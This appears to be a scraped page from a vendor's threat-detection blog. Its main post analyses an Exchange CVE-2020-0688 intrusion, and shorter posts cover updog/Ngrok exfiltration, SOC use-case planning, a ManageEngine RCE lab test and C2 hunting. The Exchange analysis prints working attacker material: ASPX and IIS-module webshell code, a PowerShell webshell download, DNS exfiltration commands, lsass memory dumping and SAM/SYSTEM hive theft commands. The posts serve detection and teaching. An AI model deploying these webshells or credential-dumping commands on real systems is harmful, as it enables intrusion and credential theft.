Skip navigation
All Places > Products > RSA NetWitness Platform > Blog



In this blog I describe a recent intrusion that started with the exploit of CVE-2020-0688. Microsoft released a patch for this vulnerability on 11 February 2020. In order for this exploit to work, an authenticated account is needed to be able to make requests against the Exchange Control Panel (ECP). Some organizations may still have not patched for this vulnerability for various reasons, such as prolonged change request procedures. One false sense of "comfort" for delaying this patch for some organizations could be the fact that an authenticated account is needed to execute the exploit. However, harvesting a set of credentials from an organization is typically fairly easy, either via a credential harvesting email, or via a simple dictionary attack against the exchange server. Details on the technical aspects of this exploit have been widely described on various sites. So, in this blog I will briefly describe the exploit artifacts, and then jump into the actual activity that followed the exploit, including an interesting webshell that utilizes pipes for command execution. I will then describe how to decrypt the communication over this webshell. Finally, I will highlight some of the detection mechanisms that are native to the Netwitness Platform that will alert your organization to such activity.


Exchange Exploit - CVE-2020-0688


The first sign of the exploit started on 26 February 2020. The attacker leveraged the credentials of an account it had already compromised to authenticate to OWA. An attacker could acquire such accounts either by guessing passwords due to poor password policy, or by preceding the exploit with a credential harvesting attack. Once the at least one set of credentials has been acquired, the attacker can start to issue commands via the exploit against ECP. The IIS logs contain these commands, and they can be easily decoded via a two-step process: URL Decode -> Base64 Decode.


IIS log entry of exploit code


The following Cyberchef recipe helps us decode the highlighted exploit code:'A-Za-z0-9%2B/%3D',true)


The highlighted encoded data above decodes to the following where we see the attacker attempt to echo the string 'flogon' into a file named flogon2.js in one of the public facing Exchange folders:


Decoded exploit command


The attacker performed two more exploit success checks by launching an ftp command to anonymously login to IP address, followed by a ping request to a Burp Collaborator domain:


Exploit-success checks


The attacker returned on 29 February 2020 to attempt to establish persistence on the Exchange servers (multiple servers were load balanced). The exploit commands once again started with pings to Burp Collaborator domains and FTP connection attempts to IP address to ensure that the server was still exploitable. These were followed up by commands to write simple strings into files in the Exchange directories, as shown below:


Exploit success checks


The attacker also attempted to create a local user account named “public” with password “Asp-=14789’’ via the exploit, and attempted to add this account to the local administrators group. These two actions failed.


Attacker commands
cmd /c net user public Asp-=14789 /add
cmd /c net localgroup administrators public /add


The attacker issued several ping requests to subdomains under, which is a site that can be freely used to test data exfiltration over DNS. In these commands, the DNS resolution itself is what enables the sending of data to the attacker. Again, the attacker appears to have been trying to see if the exploit commands were successful, and these DNS requests would have confirmed the success of the exploit commands.


Here is what the attacker would have seen if the requests were successful:


DNSBin RSA test


Here are some of the generic domain names the attacker tried: pings
ping –n 1
ping –n 1
ping –n 1


After confirming that the DNS requests were being made, the attacker then started concatenating the output of Powershell commands to these DNS requests in order to see the result of the commands. It is worth mentioning here that at this point the attacker was still executing commands via the exploit, and while the commands did execute, the attacker did not have a way to see the results of such attempts. Hence, initially the attacker wrote some output to files as shown above (such as flogon2.txt), or in this case sending the output of the commands via DNS lookups. So, for example, the attacker tried commands such as:


Concatenating Powershell command results to DNS queries


powershell Resolve-DnsName((test-netconnection -port 443 -informationlevel quiet).toString()+'')

powershell Resolve-DnsName((test-path 'c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth').toString()+$env:computername+'')


These types of request would have confirmed that the server is allowed to connect outbound to the Internet (by being able to reach, test the existence of the specified path, and sent the hostname to the attacker. 


Exploit command output exfiled via DNS




Once the attacker confirmed that the server(s) could reach the Internet and verified the Exchange path, he/she issued a command via the exploit to download a webshell hosted at pastebin into this directory under a file named OutlookDN.aspx (I am redacting the full pastebin link to prevent the hijacking of such webshells on other potential victims by other actors, since the webshell is password protected):


Webshell Upload via Exploit
powershell (New-Object System.Net.WebClient).DownloadFile('**REDACTED**','C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookDN.aspx')


The webshell code downloaded from pastebin is shown below:


Content of OutlookDN.aspx webshell
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="whoami" />
<asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
<script runat="server">
protected void exec(object sender, EventArgs e)
Process p = new Process();
p.StartInfo.FileName = "cmd";
p.StartInfo.Arguments = "/c " + cmd.Text;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
Response.Write("<pre>\r\n"+p.StandardOutput.ReadToEnd() +"\r\n</pre>");
protected void Page_Load(object sender, EventArgs e)
if (Request.Params["pw"]!="*******REDACTED********") Response.End();


At this point the exploit was no longer necessary since this webshell was now directly accessible and the results of the commands were displayed back to the attacker. The attacker proceeded to execute commands via this webshell and upload other webshells from this point forward. One of the other uploaded webshells is shown below:


Webshell 2
powershell [System.IO.File]::WriteAllText('c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\a.aspx',[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiU+PCVTeXN0ZW0uSU8uRmlsZS5Xcml0ZUFsbEJ5dGVzKFJlcXVlc3RbInAiXSxDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoUmVxdWVzdC5Db29raWVzWyJjIl0uVmFsdWUpKTslPgo=')))

The webshell code decoded from above is:


<%@ Page Language="C#"%><%System.IO.File.WriteAllBytes(Request["p"],Convert.FromBase64String(Request.Cookies["c"].Value));%>


At this point the attacker performed some of the most common activities that attackers perform during the early stages of the compromise. Namely, credential harvesting,  user and group lookups, some pings and directory traversals.


The credential harvesting consisted of several common techniques:


Credential harvesting related activity

Used SysInternal’s ProcDump (pr.exe) to dump the lsass.exe process memory:

cmd.exe /c pr.exe -accepteula -ma lsass.exe lsasp

Used the comsvcs.dll technique to dump the lsass.exe process memory:

cmd /c tasklist | findstr lsass.exe
cmd.exe /c rundll32.exe c:\windows\system32\comsvcs.dll, Minidump 944 c:\windows\temp\temp.dmp full

Obtained copies of the SAM and SYSTEM hives for the purpose of harvesting local account password hashes. 

These files were then placed on public facing exchange folders and downloaded directly from the Internet:

cmd /c copy c:\windows\system32\inetsrv\system
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\system.js"

cmd /c copy c:\windows\system32\inetsrv\sam
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\sam.js"


In addition to the traditional ASPX type webshells, the attacker introduced another type of webshell into the Exchange servers. Two files were uploaded under the c:\windows\temp\ folder to setup this new backdoor:




File System.Web.TransportClient.dll is webshell, whereas file tmp.ps1 is a script to register this DLL with IIS. The content of this script are shown below:


[System.Reflection.Assembly]::Load("System.EnterpriseServices, Version=, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a")            
$publish = New-Object System.EnterpriseServices.Internal.Publish
$name = (gi C:\Windows\Temp\System.Web.TransportClient.dll).FullName
$type = "System.Web.TransportClient.TransportHandlerModule, " + [System.Reflection.AssemblyName]::GetAssemblyName($name).FullName
c:\windows\system32\inetsrv\Appcmd.exe add module /name:TransportModule /type:"$type"


The decompiled code of the DLL is shown below (I am only showing part of the AES encryption key, to once again prevent the hijacking of such a webshell):


using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Security.Cryptography;
using System.Text;
namespace System.Web.TransportClient
public class TransportHandlerModule : IHttpModule
public void Init(HttpApplication application)
application.BeginRequest += new EventHandler(this.Application_EndRequest);
private void Application_EndRequest(object source, EventArgs e)
HttpContext context = ((HttpApplication) source).Context;
HttpRequest request = context.Request;
HttpResponse response = context.Response;
string keyString = "kByTsFZq********nTzuZDVs********";
string cipherData1 = request.Params[keyString.Substring(0, 8)];
string cipherData2 = request.Params[keyString.Substring(16, 8)];
if (cipherData1 != null)
response.ContentType = "text/plain";
string plain;
string command = TransportHandlerModule.Decrypt(cipherData1, keyString);
plain = cipherData2 != null ? TransportHandlerModule.Client(command, TransportHandlerModule.Decrypt(cipherData2, keyString)) :;
catch (Exception ex)
plain = "error:" + ex.Message + " " + ex.StackTrace;
response.Write(TransportHandlerModule.Encrypt(plain, keyString));
private static string Encrypt(string plain, string keyString)
byte[] bytes1 = Encoding.UTF8.GetBytes(keyString);
byte[] salt = new byte[10]
(byte) 1,
(byte) 2,
(byte) 23,
(byte) 234,
(byte) 37,
(byte) 48,
(byte) 134,
(byte) 63,
(byte) 248,
(byte) 4
byte[] bytes2 = new Rfc2898DeriveBytes(keyString, salt).GetBytes(16);
RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
rijndaelManaged1.Key = bytes1;
rijndaelManaged1.IV = bytes2;
rijndaelManaged1.Mode = CipherMode.CBC;
using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
using (MemoryStream memoryStream = new MemoryStream())
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateEncryptor(bytes1, bytes2), CryptoStreamMode.Write))
byte[] bytes3 = Encoding.UTF8.GetBytes(plain);
memoryStream.Write(bytes2, 0, bytes2.Length);
cryptoStream.Write(bytes3, 0, bytes3.Length);
return Convert.ToBase64String(memoryStream.ToArray());
private static string Decrypt(string cipherData, string keyString)
byte[] bytes = Encoding.UTF8.GetBytes(keyString);
byte[] buffer = Convert.FromBase64String(cipherData);
byte[] rgbIV = new byte[16];
Array.Copy((Array) buffer, 0, (Array) rgbIV, 0, 16);
RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
rijndaelManaged1.Key = bytes;
rijndaelManaged1.IV = rgbIV;
rijndaelManaged1.Mode = CipherMode.CBC;
using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
using (MemoryStream memoryStream = new MemoryStream(buffer, 16, buffer.Length - 16))
using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateDecryptor(bytes, rgbIV), CryptoStreamMode.Read))
return new StreamReader((Stream) cryptoStream).ReadToEnd();
private static string run(string command)
string str = "/c " + command;
Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = str;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
return process.StandardOutput.ReadToEnd();
private static string Client(string command, string path)
string pipeName = "splsvc";
string serverName = ".";
Console.WriteLine("sending to : " + serverName + ", path = " + path);
using (NamedPipeClientStream pipeClientStream = new NamedPipeClientStream(serverName, pipeName))
StreamWriter streamWriter = new StreamWriter((Stream) pipeClientStream);
return new StreamReader((Stream) pipeClientStream).ReadToEnd();
public void Dispose()


The registered DLL shows up in the IIS Modules as TransportModule:


IIS Module Installation


This DLL webshell is capable of executing commands directly via cmd.exe, or send the command to a pipe named splsvc. In this setup, the DLL acts as the pipe client, i.e. it sends data to the named pipe. In order to setup the other side of the pipe (i.e. the server side of the pipe), the attacker executed this command:


cmd.exe /c WMIC /node:"." process call create "powershell -enc


The encoded data in the Powershell command decodes to this script, which sets up the pipe server:


$script = {
     $pipeName = 'splsvc'
     $cmd = Get-WmiObject Win32_Process -Filter "handle = $pid" | Select-Object -ExpandProperty commandline
     $list = Get-WmiObject Win32_Process | Where-Object {$_.CommandLine -eq $cmd -and $_.Handle -ne $pid}
     if ($list.length -ge 50) {
          $list | foreach-Object -process {stop-process -id $_.Handle}
     function handleCommand() {
          while ($true) {
               Write-Host "create pipe server"
               $sid = new-object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::WorldSid, $Null)
               $PipeSecurity = new-object System.IO.Pipes.PipeSecurity
               $AccessRule = New-Object System.IO.Pipes.PipeAccessRule("Everyone", "FullControl", "Allow")
               $pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60, 'Byte', 'None', 32768, 32768, $PipeSecurity
               #$pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60
               $reader = new-object System.IO.StreamReader($pipe);
               $writer = new-object System.IO.StreamWriter($pipe);

               $path = $reader.ReadLine();
               $data = ''
               while ($true) {
                    $line = $reader.ReadLine()
                    if ($line -eq '**end**') {
                    $data += $line + [Environment]::NewLine
               write-host $path
               write-host $data
               try {
                    $parts = $path.Split(':')
                    $index = [int]::Parse($parts[0])
                    if ($index + 1 -eq $parts.Length) {
                         $retval = iex $data | Out-String
                    } else {
                         $parts[0] = ($index + 1).ToString()
                         $newPath = $parts -join ':'
                         $retval = send $parts[$index + 1] $newPath $data
                         Write-Host 'send to next' + $retval
               } catch {
                    $retval = 'error:' + $env:computername + '>' + $path + '> ' + $Error[0].ToString()
               Write-Host $retval
     function send($next, $path, $data) {
          write-host 'next' + $next
          write-host $path
          $client = new-object System.IO.Pipes.NamedPipeClientStream $next, $pipeName, 'InOut', 'None', 'Anonymous'
          $writer = new-object System.IO.StreamWriter($client)
          $reader = new-object System.IO.StreamReader($client);
          $resp = $reader.ReadToEnd()
     $ErrorActionPreference = 'Stop'
Invoke-Command -ScriptBlock $script


From an EDR perspective, the interesting aspect of this type of webshell is that other than the command to setup the pipe server, which is executed via the w3wp.exe process, the rest of the commands are executed via the Powershell command that sets up the pipe server, even though the commands are coming through w3wp.exe process. In fact, once the attacker setup this type of webshell in this intrusion, he/she deleted all of the initial ASPX based webshells.


Webshell interaction


Although during this incident the pipe webshell was only used on the exchange server itself, it is possible to 


Webshell Data Decryption


In order to communicate with this webshell, the attacker issued the commands via the /ews/exchange.asmx page. Lets break down the communication with this webshell and highlight some of the characteristics that make it unique. Here is a sample command:


POST /ews/exchange.asmx HTTP/1.1
host: webmail.***************.com
content-type: application/x-www-form-urlencoded
content-length: 385
Connection: close


HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-FEServer: ***************
Date: Sat, 07 Mar 2020 08:10:43 GMT
Content-Length: 1606656

627Rf6z7SNyH+zHe0dEAcBAZDH2sEfyFUe2QQjK8J7M/QBU5vDGj***** REDACTED ******


The request to /ews/exchange.asmx is done in lowercase. While there are a couple of email clients that exhibit that same behavior, they could be quickly filtered out, especially when we see that the requests to this webshell do not even contain a user agent. We also notice that several of the other HTTP headers are in lowercase. Namely,

host: vs Host:

content-type: vs Content-Type:

content-length: vs Content-Length:


The actual command follows the HTTP headers. Lets break down this command:




The beginning of the payload contains part of the AES encryption key. Namely, in the decompiled code shown above we notice that the AES key is: kByTsFZq********nTzuZDVs********


The data that follows the first 8 bytes of the key is shown below:




Lets decrypt this data step by step, and build a Cyberchef recipe to do the job for us:


Step 1 - 3: The obfuscated data needs to be URL decoded, however, the + character is a legitimate Base64 character that is misinterpreted by the URL decoder as a space. So, we first replace the + with a . (dot). The + character will not necessarily be in every chunk of Base64 encoded data, but we need to account for it in order to build an error free recipe.


Decrypting: Step 1-3


Step 4 – 5: At this point we can Base64 decode the data. However, the data that we will get from this step is binary in nature, so we will convert to ASCII hex as well, since we need to use part of it for the AES IV.


Decryption: Step 4-5


Step 6 – 7: The first 32 bytes of ASCII hex (16 bytes raw) are the AES IV, so in these two steps we use the Register function of Cyberchef to store these bytes in $R0, and then remove them with the Replace function:


Decryption: Step  6-7


Step 8: Finally we can decrypt the data using the static AES key that we got from the decompiled code, and the dynamic IV value that we extracted from the decoded data.


Decryption: Step 8


The actual recipe is shown below:'option':'Simple%20string','string':'%2B'%7D,'.',true,false,true,false)URL_Decode()Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%2B',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true)To_Hex('None',0)Register('(.%7B32%7D)',true,false,false)Find_/_Replace(%7B'option':'Regex','string':'.%7B32%7D(.*)'%7D,'$1',true,false,true,false)AES_Decrypt(%7B'option':'Latin1','string':'kByTsFZqREDACTEDnTzuZDVsREDACTED'%7D,%7B'option':'Hex','string':'$R0'%7D,'CBC','Hex','Raw',%7B'option':'Hex','string':''%7D)


We use the same recipe to decode the second chunk of encoded data in the request (SryqIaK3fpejyDoOdyf9b%2Fi7aBqPAzBL1SUROVuScbc%3D), which ends up only decoding to the following:


Decryption: Part 2


The response does not contain any parts of the key, so we can just copy everything following the HTTP headers and decrypt with the same formula. Here is a partial view of the results of the command, which is just a file listing of the \Windows\temp folder:


Decrypt Response


NetWitness Platform - Detection


The malicious activity in this incident will be detected at multiple stages by NetWitness Endpoint from the exploit itself, to the webshell activity and subsequent commands executed via the webshells. The easiest way to detect webshell activity, regardless of its type, is to monitor any web daemon processes (such as w3wp.exe) for uncommon behavior. Uncommon behavior for such processes primarily falls into three categories:

  1. Web daemon process starting a shell process.
  2. Web daemon process creating (writing) executable files.
  3. Web daemon process launching uncommon processes (here you may have to filter out some processes based on your environment).


The NetWitness Endpoint 11.4 comes with various AppRules to detect webshell activity:


Webshell detection rules


The process tree will also reveal the commands that are executed via the webshell in more detail:


Process flow


Several other AppRules detect the additional activity, such as:

PowerShell Double Base64
Runs Powershell Using Encoded Command
Runs Powershell Using Environment Variables
Runs Powershell Downloading Content
Runs Powershell With HTTP Argument
Creates Local User Account


As part of your daily hunting you should always also look at any Fileless_Scripts, which are common when encoded powershell commands are executed:


Fileless_Script events


From the NetWitness packet perspective such network traffic is typically encrypted unless SSL interception is already in place. RSA highly recommends that such technology is deployed in your network to provide visibility into this type of traffic, which also makes up a substantial amount of traffic in every network.


Once the traffic is decrypted, there are several aspects of this traffic that are grouped in typical hunting paths related to  the HTTP protocol, such as HTTP with Base64, HTTP with no user agent, and several others shown below:


Service Analysis


The webshell commands are found in the Query meta key:


Query meta key


In order to flag the lowercase request to /ews/exchange.asmx we will need to setup a custom configuration using the SEARCH parser, normally disabled by default. We can do the same with the other lowercase headers, which are the characteristics we observed of whatever client the attacker is using to interact with this webshell. In NWP we can  quickly setup this in the search.ini file of your decoder.  Any hits for this string can then be referenced in AppRules by using this expression (found = 'Lowercase EWS'), and can be combined with other metadata.


Search.ini config




This incident demonstrates the importance of timely patching, especially when a working exploit is publicly available for a vulnerability. However, regardless of whether you are dealing with a known exploit or a 0-day, daily hunting and monitoring can always lead to early detection and reduced attacker dwell time. The NetWitness Platform will provide your team with the necessary visibility to detect and investigate such breaches.


Special thanks to Rui Ataide and Lee Kirkpatrick for their assistance with this case.

Lee Kirkpatrick

What's updog?

Posted by Lee Kirkpatrick Employee Mar 16, 2020

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set adhoc SSL certificates and use HTTP basic auth. It was created by sc0tfree  and can be found on his GitHub page here. In this blog post we will use updog to exfiltrate information and show you the network indicators left behind from its usage.


The Attack

We are starting updog with all the default settings on the attacker machine, this means it will expose the directory we are currently running it from over HTTP on port 9090:


In order to quickly make updog publicly accessible over the internet, we will use a service called, Ngrok. This service exposes local servers behind NATs and firewalls to the public internet over secure tunnels - the free version of Ngrok creates a randomised URL and has a lifetime of 8 hours if you have not registered for a free account:


This now means that we can access our updog server over the internet using the randomly generated Ngrok URL, and upload a file from the victims machine:


The Detection using NetWitness Network

An item of interest for defenders should be the use of services such as Ngrok. They are commonly utilised in phishing campaigns as the generated URLs are randomised and short lived. With a recent update to the DynDNS parser from William Motley, we now tag many of these services in NetWitness under the Service Analysis meta key with the meta value, tunnel service:



Pivoting into this meta value, we can see there is some HTTP traffic to an Ngrok URL, an upload of a file called supersecret.txt, a suspicious sounding Server Application called werkzeug/1.0.0 python/3.8.1, and a Filename with a PNG image named, updog.png:



Reconstructing the sessions for this traffic, we can see the updog page as the attacker saw it, and we can also see the file that was uploaded by them:



NetWitness also gives us the ability to extract the file that was transferred to the updog server, so we can see exactly what was exfiltrated:


Detection Rules

The following table lists an application rule you can deploy to help with identifying these tools and behaviours:






Packet Decoder

Detects the usage of Updog

server begins 'werkzeug ' && filename = 'updog.png '





As a defender, it is important to monitor traffic to services such as Ngrok as they can pose a significant security risk to your organisation, there are also multiple alternatives to Ngrok and traffic to those should be monitored as well. In order for the new meta value, tunnel service to start tagging these services, make sure to update your DynDNS Lua parser.


Security Operation Centre (SOC) comes in different forms (e.g. In-House, Outsourced, Hybrid etc) and sizes, depending on multiple factors such as the objectives and functions that the SOC is meant to serve, as well as the intended scale of monitoring. However, in almost all SOCs, there will always be a SIEM, which basically acts as the brain of the SOC to pick up anomalies by correlating and performing sense-making on the information coming in from various packet and log sources. More than often, the efficiency of your SOC in being able to detect potential breaches in a timely manner, depends very much on the SIEM itself, which includes from having the correct sizing and configuration, being integrated with the relevant data sources, to having the right Use Cases deployed, among others. In this post, we will be focusing on the strategy to plan and develop Use Cases that will lead to effective monitoring and detection in your SOC.  


Prioritise your Use Case Development by Road-mapping

When you are first starting out on your SOC journey, there will be many Use Cases which may come to mind that would cater to different threat scenarios. Most of the SOCs would typically make use of the Out-Of-The-Box (OOTB) Use Cases that are available as a start, however, this will not be sufficient in the long run. Hence, there is a need to also develop your own Use Cases on top of the OOTB ones. The fact is that Use Case development is a lengthy and on-going process, from identifying the problem statement to finetuning the Use Cases, and also coupled with the fact that the threat landscape is constantly evolving. Therefore, it is always important to be able to prioritise which Use Cases to be developed first and one of the best ways to do so, is to come up with a roadmap. 


When it comes to road-mapping for your Use Case development, there are many good open-source references available, such as the MITRE ATT&CK Framework and THE VERIS Framework, which are useful resources to aid you in your roadmap planning, further information can be found in the following URLs - MITRE ATT&CK, THE VERIS However, it is important to note that while such frameworks form good references, they should not be taken wholesale when it comes to planning for your organisation’s Use Case development roadmap, reason being all organisations are unique and therefore not all areas are applicable. Prior to planning for the roadmap, it will be worthwhile to first perform a Priority Analysis, where you can identify the priority areas in which the Use Cases should be focused upon, based on factors such as the following:


  •      Existing threat profile including top known threats,


  •     Critical Assets and Services (note: It is extremely important for an organisation to have in place a well-defined methodology to regularly and systematically identify Critical Assets and Services as the outputs from such identification exercises are integral to many other parts of your security operations e.g. from deciding on the level of monitoring of an asset to assigning the appropriate severity level to an incident.)


  •      Critical Impact Areas to the organisation e.g. Financial, Reputation, Regulatory etc.


With the Priority Analysis being performed, you will then be able to identify which are your “Crown Jewels” and prioritise the protection efforts by developing the relevant Use Cases around them.


The Development Lifecycle

Once the priority areas have been identified, the next step will be to brainstorm for relevant Use Cases in these areas, before developing and finally deploying them into the SIEM. The following summarises the phases in a typical Use Case development lifecycle:


  1.       Define Problem Statement. This highlights the “problem” that you wish to solve (i.e. the threat that you wish to detect) by having the Use Case, and give rises to the objective of the Use Case which you are planning to develop. It is important to note that in planning which Use Case to be developed, the relevancy of a Use Case should not be determined solely based on presence of indicators from the past logs of the environment, because it does not mean that an incident (e.g. breach) that have not happened before will not occur in the future (Refer to the Priority Analysis explained in the previous section for recap on how to identify relevant Use Cases).  


  1.       Develop High Level Logic. Once the objective of the Use Case is clear, the next step will be to develop the high-level logic of the Use Case using pseudo code. This includes identifying the necessary parameters such as the length of the “view” or “window” and the number of counts required to trigger the Use Case. Try to avoid focusing too much on the actual syntax at this stage as this may cloud your thinking and increase the chances of introducing errors into your logic design.


  1.       Identify Data Requirements. Identify the packet and/ or log sources that are required as inputs into the Use Case and check their availability in the production environment.


  1.      Check Live Resource or Internal Library. Based on the high-level logic developed, always try to look for similar and existing Use Cases that are available in the Live Resource (more information at:, community platforms or your own internal Use Case library, instead of developing them from scratch, as this would help to potentially minimize the efforts on development and at the same time reduce chances of human errors.


  1.     Development. Proceed to develop the Use Case in syntax form by either making modifications from existing references or develop from scratch if there are no other alternatives.


  1.     Test & Deploy. Deploy the Use Case in a test or staging environment where possible, and simulate the threat scenario which the Use Case is intended to detect to confirm that the Use Case is functioning correctly, before proceeding to deploy it in the production environment. Note that there is an option in NetWitness to deploy the Use Case as a Trial Rule, more information can be found at:


  1.       Monitor False Positive & False Negative Rates. Once the rule has been successfully deployed into the SIEM, set up the necessary metrics to monitor the False Positive and False Negative rates.
  •  A high False Positive rate is likely to take a toll on the SOC operations in the long run, as unnecessary human resources and efforts would be spent on triaging all the false positives.


  •  Do note that while False Positives can be determined following triage, it is much more challenging to determine and obtain an accurate picture of the False Negative rate, as this is only possible when you happened to learn of an actual breach and where the relevant Use Case failed to trigger in your environment i.e. you do not know what you do not know. In many instances, breaches could go undetected for a prolonged period of time, hence making False Negative rate an extremely difficult metric to be measured. Therefore, it is important to properly test out the Use Case where possible, following initial deployment.


  1.      Finetune. Now, should you stop yourself from deploying a particular Use Case for fear of introducing a potentially high False Positive rate? We all know that high false positive rates are one of the nightmares for an analyst, however, we should not be stopping ourselves from deploying a particular Use Case into the environment simply because of this, reason being the Use Case serves to exist in the first place because of the “problem” that you need to solve (as defined in your Problem Statement). Rather, we should look to deploy, monitor and fine tune the Use Case to reduce the False Positive rate over time. At this point, we have to caution that this is not a one-time process and may require several iterations of review and finetuning over time to eventually stabilise the False Positive rate to an acceptable level.


  1.      Regular Review. Again, as the threat landscape evolves constantly, we should look to put in place a process to conduct regular reviews of the existing Use Cases, finetune or even retire them if they are no longer relevant, in order to maintain the overall detection efficiency of the SIEM.



Now that the Use Case has been deployed into the environment, what is the next step? While the monitoring and detection part of the cycle has been taken care of, it is equally important to also ensure that we have a robust incident response mechanism in place. Apart from the Incident Response Framework which spells out the high-level response process, it is recommended to go into the second order of details to put in place the relevant Playbooks, which are step-by-step response procedures with tasks tagged to individual SOC roles and specific to different threat scenarios. As a good practice, such Playbooks should also be tagged to the relevant Use Cases that are deployed in your SOC. The following diagram summarises how we can make use of the playbooks during the Incident Response cycle depending on the maturity level of the SOC:


  1.       Printed Procedures. This is the least mature method to operate the Playbooks and is generally not recommended unless there are no other suitable alternatives.


  1.      Shared Spreadsheet. This is suitable for small scaled or newly set-up SOCs which are not ready to invest in a SIRP or SOAR yet. For each new case, the relevant playbook template can be pulled out and populated onto an excel spreadsheet (or equivalent) and have it deposited into a shared drive available to all the SOC members, where analysts could update the incident response actions that they have taken while the SOC Manager, Incident Handler or Analyst Team Lead could track the status of the open cases through these spreadsheets.


  1.     SIRP. This is basically an Incident Management Platform which allow the analysts to easily apply the relevant playbooks and update the status of the incidents in a centralised platform. As compared to the spreadsheet method, the SIRP allows for a stricter access control in terms of being able to define and enforce different level of permissions across different roles in the platform, as well as the ability to maintain an audit trail.


  1.      SOAR. This Orchestrator provides a greater degree of automation in the incident response as compared to SIRP, which could potentially cut down the response time and increase the overall efficiency of the analysts.



To conclude, there is no one-size-fit-all solution when it comes to developing the Use Cases in your organisation and one of the recommended ways is to define a short-to-medium term roadmap customised to your environment for Use Case development. The roadmap should also be reviewed and revised from time-to-time to ensure that it stays relevant to the constantly evolving threat landscape. In general, your SOC should have adequate coverage (in terms of monitoring, detection and response) across different phases in the Cyber Kill Chain as shown below:



We hope that you find this useful in planning for the Use Cases to be developed in your organisation and happy building!

A zero-day RCE (Remote Code Execution) exploit against ManageEngine Desktop Central was recently released by ϻг_ϻε (@steventseeley). The description of how this works in full and the code can be found on his website, We thought we would have a quick run of this through the lab to see what indicators it leaves behind.


The Attack

Here we simply run the script and pass two parameters, the target, and the command - which in this case is using cmd.exe to execute whoami and output the result to a file named si.txt:


We can then access the output via a browser and see that the command was executed as SYSTEM:


Here we execute ipconfig:


And grab the output:


The Detection in NetWitness Packets

The script sends a HTTP POST to the ManageEngine server as seen below. It targets the MDMLogUploaderServlet over its default port of 8383 to upload a file with controlled content for the deserialization vulnerability to work, in this instance the file is named The command to be executed can also be seen in the body of the POST:

The traffic by default for this exploit is over HTTPS, so you would need SSL interception to see what is shown here.


This is followed by a GET request to the file that was uploaded via the POST for the deserialization to take place, which is what executes the command passed in the first place:


This activity could be detected by using the following logic in an application rule:

(service = 80) && (action = 'post') && (filename = 'mdmloguploader') && (query begins 'udid=') || (service = 80) && (action = 'get') && (directory = '/cewolf/')


The Detection Using NetWitness Endpoint

To detect this RCE in NetWitness Endpoint, we have to look for Java doing something it normally shouldn't, as this is what ManageEngine uses. It is not uncommon for Java to execute cmd, so the analyst has to look into the commands to understand if it is normal behaviour or not - from the below we can see java.exe spawning cmd.exe and running reconaissance type commands, such as whoami and ipconfig - this should stand out as odd:


The following application rule logic could be used to pick up on this activity. Here we are looking for Java being the source of execution as well as looking for the string "tomcat" to narrow it down to Apache Tomcat web servers that work as the backend for the ManageEngine application, the final part is identifying fileless scripts being executed by it:

(filename.src ='java.exe') && (param.src contains'tomcat') && (filename.dst begins '[fileless','cmd.exe')

Other java based web servers will likely show a similar pattern of behavior when being exploited.




As an analyst it is important to stay up to date with the latest security news to understand if you organisation could potentially be at risk of compromise. Remote execution vulnerabilities such as the one outlined here can be an easy gateway into your network, and any devices reachable from the internet should be monitored for anomalous behaviour such as this. Applications should always be kept up to date and patches applied where available ASAP to avoid becoming a potential victim.

This post is going to cover a slightly older C2 framework from Silent Break Security called, Throwback C2. As per usual, we will cover the network and endpoint detections for this C2, but we will delve a little deeper into the threat hunting process for NetWitness as well.


The Attack

After installing Throwback and compiling the executable for infection, which in this case, we will just drop and execute manually. We will shortly see the successful connection back to the Throwback server:


Now we have our endpoint communicating back with our server, we can execute typical reconaissance type commands against it, such as whoami:


Or tasklist to get a list of running processes:


This C2 has a somewhat slow beacon that by default is set to ~10 minutes, so we have to wait that amount of time for our commands to be picked up and executed:



Detection Using NetWitness Network

To begin hunting, the analyst needs to prepare a hypothesis of what it is they believe is currently taking place in their network. This process would typically involve the analyst creating multiple hypotheses, and then using NetWitness to prove, or disprove them; for this post, our hypothesis is going to be that there is C2 traffic - these can be as specific or as broad as you like, and if you struggle to create them, the MITRE ATT&CK Matrix can help with inspiration.


Now that we have our hypothesis, we can start to hunt through the data. The below flow is an example of how we do exactly that with HTTP:

  1. Based on what we are looking for defines the direction. So in this case, we are looking for C2 communication, which means our direction will be outbound (direction = 'outbound')
